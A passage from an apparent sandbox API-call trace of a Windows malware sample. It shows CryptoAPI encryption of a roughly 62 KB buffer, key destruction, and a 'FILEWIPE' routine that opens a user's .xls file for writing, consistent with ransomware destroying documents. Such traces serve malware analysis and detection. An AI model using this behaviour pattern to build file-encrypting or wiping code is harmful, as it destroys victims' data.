lpsz="__CRYPT_REFCOUNT") returned 0x10 [0031.449] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0031.449] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0031.449] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3a8 [0031.449] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0031.449] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0031.449] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0031.449] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0031.449] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0031.449] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0031.449] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0031.449] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0031.449] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0031.449] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0031.449] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.449] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0031.449] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.449] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0031.450] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0031.450] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0031.450] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.450] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.450] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0031.450] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b70 [0031.450] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0031.450] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0031.450] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0031.450] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0031.450] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.450] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0031.450] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3a8 [0031.450] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0031.450] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.450] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0031.450] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0031.450] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0031.451] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0031.451] CryptEncrypt (in: hKey=0x7c2200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0xf4c4, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0xf4d0) returned 1 [0031.451] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.451] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.451] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.451] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.451] CharLowerBuffW (in: lpsz="byte[62673]", cchLength=0xb | out: lpsz="byte[62673]") returned 0xb [0031.451] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.452] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.452] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.452] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0031.452] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.452] CryptEncrypt (in: hKey=0x7c2200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x8ae950*, pdwDataLen=0x6ae220*=0xf4c4, dwBufLen=0xf4d0 | out: pbData=0x8ae950*, pdwDataLen=0x6ae220*=0xf4d0) returned 1 [0031.453] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.453] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.453] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.453] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.453] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.453] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.453] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0031.453] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0031.453] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0031.453] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0031.453] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0031.453] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0031.453] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0031.453] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0031.453] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0031.453] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0031.453] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.456] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.456] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.456] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.458] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.458] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.459] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0031.459] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0031.459] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.459] PeekMessageW (in: lpMsg=0x6ae3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3fc) returned 0 [0031.459] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.459] CryptDestroyKey (hKey=0x7c2200) returned 1 [0031.459] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0031.459] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0031.459] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0031.459] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0031.459] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0031.459] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0031.459] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0031.459] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0031.459] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0031.459] PeekMessageW (in: lpMsg=0x6ae3d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3d4) returned 0 [0031.459] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0031.459] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0031.460] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0031.460] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0031.460] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.460] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0031.460] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.460] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0031.460] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0031.460] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0031.460] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.460] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0031.460] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0031.460] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.460] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.460] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0031.460] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0031.460] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0031.460] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.460] CryptReleaseContext (hProv=0x7d5bb8, dwFlags=0x0) returned 1 [0031.460] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.461] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.461] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0031.461] FreeLibrary (hLibModule=0x754b0000) returned 1 [0031.461] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.461] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.461] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.462] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.462] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.462] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0031.462] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0031.463] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.463] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.463] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\R99f_hoG0iVXG.xls", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7f62b900, ftCreationTime.dwHighDateTime=0x1d5c31a, ftLastAccessTime.dwLowDateTime=0x5360f1c0, ftLastAccessTime.dwHighDateTime=0x1d5c17e, ftLastWriteTime.dwLowDateTime=0x5360f1c0, ftLastWriteTime.dwHighDateTime=0x1d5c17e, nFileSizeHigh=0x0, nFileSizeLow=0xf4c4, dwReserved0=0x0, dwReserved1=0x777648, cFileName="R99f_hoG0iVXG.xls", cAlternateFileName="R99F_H~1.XLS")) returned 0x7c2240 [0031.463] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0031.463] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.463] CharLowerBuffW (in: lpsz="byte[62660]", cchLength=0xb | out: lpsz="byte[62660]") returned 0xb [0031.463] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.463] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0031.463] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.463] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0031.464] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0031.464] FreeLibrary (hLibModule=0x76b40000) returned 1 [0031.464] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.464] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.464] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.464] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0031.464] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.464] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.464] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.464] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.464] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.464] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.464] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.464] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.464] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.464] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.464] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.464] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.464] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.464] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.464] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.464] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.465] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0031.465] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0031.465] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\R99f_hoG0iVXG.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tpm9533uyxhl8c6vtf\\tjni\\lk15vz5k\\r99f_hog0ivxg.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x128 [0031.465] FreeLibrary (hLibModule=0x76e10000) returned 1 [0031.465] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.465] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.465] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.465] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0031.465] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.465] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.465] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0031.465] FreeLibrary (hLibModule=0x76e10000) returned 1 [0031.465] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.466] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.466] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.466] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.466] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0031.466] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 